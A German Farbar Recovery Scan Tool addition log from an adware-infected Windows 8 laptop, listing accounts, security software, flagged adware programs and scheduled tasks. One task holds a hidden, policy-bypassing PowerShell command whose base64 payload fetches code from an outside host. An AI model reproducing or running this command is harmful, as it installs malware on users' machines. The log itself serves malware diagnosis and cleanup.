Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-01-2016
durchgeführt von Manz (2016-02-06 19:10:49)
Gestartet von E:\
Windows 8 (X64) (2016-01-31 10:55:10)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2229505580-413648313-3343944023-500 - Administrator - Disabled) => C:\Users\Administrator
Gast (S-1-5-21-2229505580-413648313-3343944023-501 - Limited - Disabled)
Manz (S-1-5-21-2229505580-413648313-3343944023-1002 - Administrator - Enabled) => C:\Users\Manz

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: McAfee  Anti-Virus und Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee  Anti-Virus und Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee  Firewall (Enabled) {959DA8E2-3527-57D1-4915-924367AD4FE9}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Acer Backup Manager (HKLM-x32\...\InstallShield_{9DDDF20E-9FD1-4434-A43E-E7889DBC9420}) (Version: 4.0.0.0059 - NTI Corporation)
Acer Device Fast-lane (HKLM\...\{3F62D2FD-13C1-49A2-8B5D-47623D9460D7}) (Version: 1.00.3007 - Acer Incorporated)
Acer Instant Update Service (HKLM\...\{F6100F13-F183-47A2-94A8-9AAC4976E228}) (Version: 1.00.3013 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3006 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3011 - Acer Incorporated)
AcerCloud (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.01.3115 - Acer Incorporated)
AcerCloud Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.00.3201 - Acer Incorporated)
Backup Manager v4 (x32 Version: 4.0.0.0059 - NTI Corporation) Hidden
BoBrowser (HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\BoBrowser) (Version: 45.0.2454.131 - BoBrowser) <==== ACHTUNG
Body Text Feathering (HKLM-x32\...\PopupProduct) (Version: 1.0.0.0 - Body Text Feathering) <==== ACHTUNG
BrowserAir (HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\BrowserAir) (Version: 47.0.0.4 - BrowserAir)
BubbleSound (HKLM\...\BubbleSound) (Version: 1.0 - ) <==== ACHTUNG
Chromium (HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Chromium) (Version: 46.0.2472.0 - Chromium)
clear.fi Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.01.3107 - Acer Incorporated)
DNS Unlocker version 1.4 (HKLM-x32\...\{E1527582-8509-4011-B922-29E3FB548882}_is1) (Version: 1.4 - www.dnsunlocker.com) <==== ACHTUNG
GamesDesktop 014.005010223 (HKLM-x32\...\gmsd_de_005010223_is1) (Version:  - GAMESDESKTOP) <==== ACHTUNG
GamesDesktop 014.005010228 (HKLM-x32\...\gmsd_de_005010228_is1) (Version:  - GAMESDESKTOP) <==== ACHTUNG
Games-desktop Maintenance 014.184 (HKLM-x32\...\rec_de_184_is1) (Version:  - GAMESDESKTOP) <==== ACHTUNG
GMX MailCheck (HKLM-x32\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.6.1 - 1&1 Mail & Media GmbH)
GMX Softwareaktualisierung (HKLM-x32\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.3.0 - 1&1 Mail & Media GmbH)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3004 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2828 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3003 - Acer Incorporated)
Max Driver Updater (HKLM-x32\...\Max Driver Updater_is1) (Version: 2.7.1086.16649 - csmedia.com) <==== ACHTUNG
McAfee Internet Security Suite (HKLM-x32\...\MSC) (Version: 11.6.385 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.141 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 38.5.1 - Mozilla)
Mozilla Thunderbird 38.5.1 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 38.5.1 (x86 de)) (Version: 38.5.1 - Mozilla)
MPC Cleaner (HKLM-x32\...\MPC) (Version:  - DotC United Inc)
Office Addin (HKLM-x32\...\{6D2BBE1D-E600-4695-BA37-0B0E605542CC}) (Version: 2.01.3200 - Acer)
Professional Cleaning Software (HKLM-x32\...\Professional Cleaning Software) (Version: 3.0.7 - Professional Cleaning Software)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.204 - Ihr Firmenname)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 11.05 - Qualcomm Atheros)
Satellite Comma (HKLM-x32\...\SoftwareUpdater) (Version: 1.0.0.0 - Satellite Comma) <==== ACHTUNG
Search Protect (HKLM-x32\...\SearchProtect) (Version: 3.0.300.22 - Client Connect LTD) <==== ACHTUNG
SearchModule (HKLM-x32\...\{D2E9FE6A-7003-42A0-96F6-5569DFC2A3A8}_is1) (Version: 2.8.9.113 - Goobzo LTD) <==== ACHTUNG
Security Utility (HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Security Utility) (Version:  - Securityutility)
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version:  - ) <==== ACHTUNG
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
shopperz (HKLM-x32\...\{E34AAB79-D422-40F2-8F78-415D84EB3A38}) (Version: 2.0.0.480 - shopperz) <==== ACHTUNG
Sound+ (HKLM\...\SoundPlus) (Version: 1.0 - )
SpaceSoundPro (HKLM\...\SpaceSoundPro) (Version: 1.0 - ) <==== ACHTUNG
SpaceSoundPro Service (HKLM-x32\...\zz.12571.ssp) (Version: 1.0.0 - CSDI) <==== ACHTUNG
SpaceSoundPro Service (HKLM-x32\...\zz.12776.ssp) (Version: 1.0.0 - CSDI) <==== ACHTUNG
SVH (HKLM-x32\...\rec_en_77_is1) (Version:  - ) <==== ACHTUNG
Update for PriceFountain (HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Price Fountain) (Version:  - Update for PriceFountain) <==== ACHTUNG
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version:  - Microsoft Corporation)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version:  - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
yoursearching uninstall (HKLM-x32\...\yoursearching uninstall) (Version:  - yoursearching) <==== ACHTUNG

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {037A375B-1376-4467-BBB3-2D9A92B163FB} - System32\Tasks\Go_Palikan => C:\Users\Manz\AppData\Local\{8396B~1\UNINST~1.EXE [2016-01-31] ()
Task: {1B2DFC51-4A80-475F-9BD8-32F048149B3C} - System32\Tasks\Builder Touch2 => Rundll32.exe "C:\Users\Manz\AppData\Local\Builder Touch\{497C67E6-3CE1-63DB-488F-F7972042349F}\vehrub.dll",#1 <==== ACHTUNG
Task: {1BBBD9D7-98F4-49E2-8BDF-E4D56C2F1675} - System32\Tasks\Builder Touch => Rundll32.exe "C:\Users\Manz\AppData\Local\Builder Touch\{497C67E6-3CE1-63DB-488F-F7972042349F}\BuilderTouch.dll",#1 <==== ACHTUNG
Task: {210D3C04-8867-4644-85F3-F73FED2CB154} - System32\Tasks\RSPro => C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe [2015-12-01] ()
Task: {56F00EA3-177B-4C69-9AFB-515D10EC8640} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTray.exe [2012-08-22] (Acer Incorporated)
Task: {673E5F4E-01C6-472F-9968-4F14787684C1} - System32\Tasks\Genius_Interval => C:\Users\Manz\AppData\Roaming\Genius\Genius.exe [2016-01-26] ()
Task: {6BBAEF98-4D8C-41CA-90E6-9EEB8289085E} - System32\Tasks\updateTask => c:\task.vbs [2016-02-06] ()
Task: {6F1C5D19-C4A1-480B-8616-5406D197B2C4} - System32\Tasks\bvxvbxxvaa => C:\Users\Manz\AppData\Local\bvxvbxxvaa\bvxvbxxvaa.exe [2016-01-14] () <==== ACHTUNG
Task: {75FE0009-11AD-45E4-87F0-7FA1441696FF} - System32\Tasks\ManzObscenelyAdV2 => Rundll32.exe ShammedFourposter.dll,main 7 1 <==== ACHTUNG
Task: {7E357E48-E878-42AC-930E-3D02D011BE22} - System32\Tasks\iuEmailOutlookAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe [2012-08-22] ()
Task: {8DA43EC2-117C-4EFF-A8EE-A7DC6FEF0790} - System32\Tasks\Recovery Management\Notification => C:\Program Files\Acer\Acer Recovery Management\Notification\Notification.exe [2012-07-31] (Acer Incorporated)
Task: {9225353A-5081-47B6-B9AA-51645027D806} - System32\Tasks\Price Fountain => C:\Users\Manz\AppData\Roaming\PriceFountain\UpdateProc\UpdateTask.exe [2016-01-31] () <==== ACHTUNG
Task: {9964E44A-C321-4B38-8F3E-E1122710B790} - System32\Tasks\Run_Bobby_Browser => C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe [2016-01-12] (The BoBrowser Authors) <==== ACHTUNG
Task: {9B972E21-327E-4B96-891F-AABF3DAE5C2C} - System32\Tasks\iuBrowserIEAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe [2012-08-22] ()
Task: {9C0C2BDE-546F-4871-923F-C9EE3A6A4A9D} - System32\Tasks\ProfessionalCleaningSoftware_Start => C:\Program Files (x86)\Professional Cleaning Software\ProfessionalCleaningSoftware.exe [2015-11-26] (Professional Cleaning Software)
Task: {9F1578F2-3470-4928-BC4F-310518E1E9D8} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {A4602711-658D-4F65-8811-B9EE6E81AFA3} - System32\Tasks\IBUpd2 => C:\Users\Manz\AppData\Local\BrowserAir\47.0.0.4\updater.exe [2016-01-31] ()
Task: {AF4BE34F-0EFF-4488-881A-1BBB7F357543} - System32\Tasks\ALU => C:\Program Files (x86)\Acer\Live Updater\updater.exe [2012-08-24] ()
Task: {AF603348-4FAB-4919-B73D-66B59E54CBDF} - System32\Tasks\Awiikjuw => C:\Program Files\shopperz010220161759\Zelba.bat [2016-02-01] () <==== ACHTUNG
Task: {C298643A-8546-49C7-A66D-7848D452C31D} - System32\Tasks\ProfessionalCleaningSoftware_Popup => C:\Program Files (x86)\Professional Cleaning Software\Splash.exe [2015-11-26] ()
Task: {C793268F-2FA7-41D6-A509-977F26F2F0F1} - System32\Tasks\runTask => C:\Users\Manz\AppData\Local\Temp/Updater.exe
Task: {D07295CC-450D-474A-910A-278242F5318E} - System32\Tasks\crash_service => C:\Users\Manz\AppData\Local\BoBrowser\Application\crash_service.exe [2016-01-12] () <==== ACHTUNG
Task: {D3D787EA-5D20-46A4-BD46-DAC64A685A02} - System32\Tasks\Security Utility Updater => C:\Program Files (x86)\\securityutility\\securityutility\\2.0.0.1\Security Utilityupdt.exe [2016-01-31] () <==== ACHTUNG
Task: {EC17F563-DE77-4458-80CD-797CC6ACFFE4} - System32\Tasks\IBUpd => C:\Users\Manz\AppData\Local\BrowserAir\47.0.0.4\updater.exe [2016-01-31] ()
Task: {F08F28CB-C795-40AE-BFF7-0AEB1389F890} - System32\Tasks\Registration 1und1 Task => C:\Program Files (x86)\1und1Softwareaktualisierung\cdsupdclient.exe [2015-01-12] (1&1 Mail & Media GmbH)
Task: {F1C37C30-BFE2-4268-9AE8-385C097807B8} - System32\Tasks\Genius => C:\Users\Manz\AppData\Roaming\Genius\Genius.exe [2016-01-26] () <==== ACHTUNG
Task: {F8E9F306-F34A-402E-A5B7-FB560F72E779} - System32\Tasks\Microsoft\Windows\AppxDeploymentClient\Pre-staged app cleanup
Task: {FD40ECC5-8C1B-4823-9BDA-73B39E4B7CB1} - System32\Tasks\ALUAgent => C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe [2012-06-22] ()
Task: {FD4BD04B-AE55-4A01-A755-4E28A2548E48} - System32\Tasks\{0D0B7D47-0F7D-040B-7811-090D050F117E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAdQBuAGwAbwBuAGcAbwAuAGkAbgBmAG8ALwB1AC8APwBhAD0AOABsAEIANgBZAGEAcwBaAFgANgB1AHIAdABSAF8AZQBGAEcAeQBTADYASwBXAEwARwBtAGgAVQBxAEcASgA0AGwAZwBvAE0AaQB1AGgATgBFAFgATwBHAHMATQB5AGoAMgA5AFEAdABlAEkAcwBiAGEANQBTADcAQwBEAFkASwAwAGMAQwB5AHIAdgA3AGsAYQBTAG0AWABCAGkAYgBOAEoAZABBAHQALQB4AEcANgB1AFUAbAB4AE4AUQB5AGkAQQBaAFYAMAA1ADYATwBuAEYAaAB6AGUAVgA4AFoARABHAFAAYwBNAFUAVABoAFAAQQA5AFgAcQBkAGEAcgBvAFIAcgBjAHoAbAB3AHoARwBqAGUAUABIAGUAeQByAG4AbgBEAGsAbQB4AGMAQQBMAFQAQQBxAHoAZwBPAEwAZwA1AFcAQwBIADEAMQB1AGgAagBQAGwAawBVADMAUABfAE4AVwB5AHUAcQAyADAAMABzAEcALQBnAHUAeQBiAGwAdABVAEYAYgBtAEYAbQBjAEcAaQBlAGYAYwBBAGIAWgBuAEMATQBOAFoAMwBqAEoAcwBpAFIASQBaAE0AYgBhAGEAcABSAEMAUAB2AEoARgBjADQAcABnAEMAbgBUAEgAZwA3AE0AYgBKAFcAdgBiAFYAZABfAEsAcAB5AGgAdgBsAGwAaABPADcAeAA1AEMAcwA0AG0AQQBiADYAUQBJAFUAZAB4AGgAbwBoAHoAYQBNADUASAA4AGQAeABlAHoAVwB0ADUAbABkAE0AXwBqAE4AcABPAE4ANABSAFUAMwBiAFAAMgA1AEoAOQA3AHYAcABIAG8AaABuAFkAVwAxADAAZAB1AHMATwBFAEUAMgBpAEYAbgBaAEMAUgBXAFkANwBIAHgAMQB1AGcANwByAE4AUQBVAEMAUQBFAFUAdQA1ADMANABKAEsAcABfADYASgBNADAAMQBvAG0AQQBPADQAbgBiAG0ASQBtADkAMQBZADMAeABLAEkAbwBGAGIAawBMAEkAOABSAEYAdgAxAEkAUwB4AHIAWAB2AFgANABqAFUAMwBGAEsAbQBxADEAMgAwAF8AVABRADUAegBFAFoARwAtAHEARQBDAHgANwB1AGIASgBzAGcANQByADYAQQBMAGEANgBHAGcANgB4AGMAegBVADgAbABYADIAYQBKAFIARgBUADYAegBZAEQARgBoADEAMQBIADcANQBIAEEAYQBhAG0AMABOAFUAOABBAEwAZQBqAFAAXwBTAEQAbQB6AG4ARgBuAGoAQwBmAFkAbABUAEEAcQB3AHYAcQA3AHcARABGAF8ALQBUAGsAMABDAEUAaABnAGEALQB3AGsANAA4ADgAZgB0ADgAWQB6AG0ASwA4AFEARwBHAHYAVgA3AGUARgBwAGgAMAByAF8ANgBVAFUAcABEAEwAagBWADUAUgA4AFQAMwA1AGUAOABPAEgAegBFAHcANwBNAGYAXwBXAFkAVwBjAHMAVAA0AFgAaABpAHoAdQBvAEEAeABGAGcAawBiAE8AdQBPADEAOQBPADUAUAB6ADcAWgAxADcAcQAyADEAcwB2AFMAcwBWAG4AagAwAGkAYwBTAGIATQBzAEgAeQBiAHUAOQBnAE8AWAA3AF8ANABsAGEAQgBIAEYAbgBvADEAWAB6AFYAVABvAFAANABEAHcAYgB0AFIAcgBlAFUARwB4ADcAYgBNADAAYwBzAEIAZwBXAFYAVwBMAGYAagBPAFoATABGAFIAUQBZAGIASABpAHoAbABVADkAWQBMAEYAUQBoAEkAXwBuAE0AQQBzAG8AbABxAEcAeQB4AEEANgA2AGYAbwBsAFUATwBXAHQAQwBZAHgAbgBQAFMAWQBJAEEAbwBOAGcATAByAHgAdgB1AGMAMgBlADYAUwBBAGoAVgAtAEQAVgBhAG0ANwBuADEANgBmAHoAVQBDAEUAaABQAE8ANgBQAHcATwBqAGsAdQA5ADgARgBQAFkAVwBYAC0AdgBGAHQATQA0AGMAcQBfAHgAWQBBAEgARQB3AEsAcgBKAFgASgBBAG0ANgBaADgASgB1AF8AbABzAHMAZgBBAFYASQBWAGIAWgB6AGcAbABVAHYAbgBwAEIAWgBKADcAUgBDADgAdwBRAEUAWAA2AC0AeAB5ADIANgBWAGQAaABlADQAeABPAHEAegBpAE8AXwB1AEgARgBvAHEAUwBsAHMAbABEAF8AUwBDAFgAMABfADgARgBPAFkAagBrAFUAUgAxADIANgA1AFMAZABwAFkAWAA3AEgAVABxAHIAZgBzAFkAcwBFADkAUQBhAFIARwBIAEkAMgA2ADAAZAB0AE0ATABpAGwAUgBxAHYAJgBjAD0AdwBmAGwAWABTAF8AbABsAGcAQwBQAGIAbwBhAFkATQBpAHAAUwBJAEUAeQA2ADQAWABxAEcAYgBQAG0AWgBiAG0AaQBSAFYAMgAxAGQAcABuAHoAbgB5AGgAUgBkAFUAaABsAEMAVwB3AHgARwA2AEEAcgBIAGMAZgBOAE4AQQBsAGgAaQBIAFMAdgA5AEEAUwA5AFgANwBXAE8AQQA5AG0AUgBxADIAUABYADkANQBsAFEAawBwAHYAaAB4AEQAUQB0AGsAcQBqAFEAcwB5AGgAVQBhAFoAawBnADEAZQByAFcAWQBVAFYAMABSAGQAZgBEAG8AVgBHAHoAVgBoADkARgBVAEoATQBCADgAOAB2ADcATQBOADAANwBRAEwASQBuAG4AaQBhAEQANgBSAFYAbABQAC0ANQBVAE8AUABJAGkAWABMAFoAWgB5AGUAcABTAGwAZwB2ADkAdQBEADQAUwBjAFcAbQA5AGkAdgBxAHoAVgBXAHYATABFAHkAOQBoAE4AUABMAGEAWABHAHkAUQBoAGwAYQBTAG4AegBVAGMASgBvAEYAbwAyAEcAYwBPAGQAVgBvAG8AdgBDAGQAUAByAEkAZQBhAE0AMQB0AEgARABlAEQAVABUAEYAMABlAG0AOABxAHMANABhAFAAegBaAFIANwBEAGwAOABMAFgAYwBIAEkAMgB1ADYAUABuAHEALQAyAFEAdgBvAHUAdQBSADAAVgBkAE8AZABSAFAASwBYAGkAeABWADQARAAyAE0AdgBzAFMAVABOAC0AbgBiAF8AUQBpAEQARABLAFkAMQBMAEYAXwBNAEkASABDAG4AMABrAEwAcQBXAFEAYQBrAFIAUwBTAEsAMwBIAFgAMgAxAFkAbwBtAC0ANQByAGkAbABFAGMARQByADcAcQBfAFUAeQByAGkAeQBWAEoAWABtAGIAVgB1AG8ARQA3ADAAVgA0AEcATQAxADMAMABuAFkAMAA1AGIAaAAzAEwAUAB6ADQAMAB2AG4ANABpAHoAZwB2ADIAQQBKAHEAbwBkADkAUwA1AHAAVQBHADQAcABWAGMAcABwAHUAcQBfAEEAcABJADcAbQAxAHEAYgBmADgANABiAFMATQBhAGYAYwBIAFQAYwB0ADEAcgBHAGoAZABFAGoANQB0AGMAQwBuAFEAOQBnAGgAUQA5ADYAbgB2ADEATAA2AHoAUgBiAHoAWABFAHkAbgBEAHkAVQBPAEcAeAA2AFUAdgBCAEkAYQB0AFgANwBoAHEALQBIAGkANABMAFMAOAB0AGUANwBlAFMAZgBVADQAdwBrAGEAbwBGAGIARgB6AG4ARQA1ADIARgBYAG0AYgB4AEgAcwB5AFAAdQBDAE4AcgAwAFYAbABOAGkANQBBAF8AZgB0AFEAbQAxAEMAVQA5AG4AbwBaAGUAZAB3AG8ASAA2AGgAagBNAHUATgAwADMASQBUAHcAbwBUAFMAWABLAEYAZwBBAHoATwBOAEwAaQA1AEUARgA5AHkASABHAFcAMwA4AEYAbwBsADYAZAAzAGkATQBtAEYAZABBAHMAdQBxAHMAagBxAEIANgBfAFcAagBhADEAMwB3ADQAZgBtAE0AQwB6AEYAeABKAHAARABEAFMAagBNAE4AYwA3AGoAOABtAHQAUABFAEgAegA3AC0AQwBoAEgATgBKADcATgBWAE4AMwA3AGkAZQBOAGgAYgBMAHUAZwAxAHgARgA1ADQAcQBwAFQAVgBWAHcATABiAGgAUwBhAHcAbQA1AGQAeQB1AE0ASgBiAGMAXwBLAHcAOQBCAGcASwBEAEIAbABaAFEAWABVAEcAeQBuADEANQBDAFoAYgBZAG0AYQBhAGUAYgBVAFgAVABvADYAVwBXAFIANQBuADYAcQBBAE4AbgBTAEIAMQBQAF8AYwBlAGUAWABGAEsAbgAzAC0AQwBaAFYAWgA0AGsANgBvAEkAMgBIAFQAaAB6AEgAOABSADIAYwB0AFkAYgBmADcARwBfAGcAUABmAEYARwBIAEMALQBIAHUAawBnAHYANABrAEMARgBqAE4AVABXAFMAYQA4ADgAQwAyAFQAYQAxAFMAMwB6ADQAaQBuAEEAVwBmAFAAdAAtAHAANABrAEYASQB6ADIANQBhAHkATAB4AEwAeABOAHoAbQBZAHEAQQB1ADEAeABkAGoAQQBKADAAWQB4AGYAYQBGAHcAZgBOAFAALQBfADgAcgBNAGEAcwBfAGwAZgBEAFUAdwAzADEAdABBAHYASQBPAEQAUgA4AGEAVwBBAFQASgB2AG0AaABFAGUASQBKADMAMQB2AGIAdwBEADMAOQBPADgAVgBRAC0ARQBkAEsAbQBUAG8AWAB2AEgATwByAHAAMQAtAFYAcAB2AHoASQBvAEIARwBVAEUAZABpAFoARQBwAEIAWQBEAEEAdQA2AEMAMAA5ADUAVwB2AFEAbwA0AEQARwBkADUAYwBtAG8AdwBoAG8ATAB4AHEAWQB3AEUARgBMACYAcgA9ADgAMAA4ADYANAA3ADAAOQA0ADkAMAAyADYAMgAzADAAOQAwADQAIgA7ACQAcwB0AHMAawA9ACIAewAwAEQAMABCADcARAA0ADcALQAwAEYANwBEAC0AMAA0ADAAQgAtADcAOAAxADEALQAwADkAMABEADAANQAwAEYAMQAxADcARQB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIAMgBPAFQAVAAyAFMAWgBPACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMg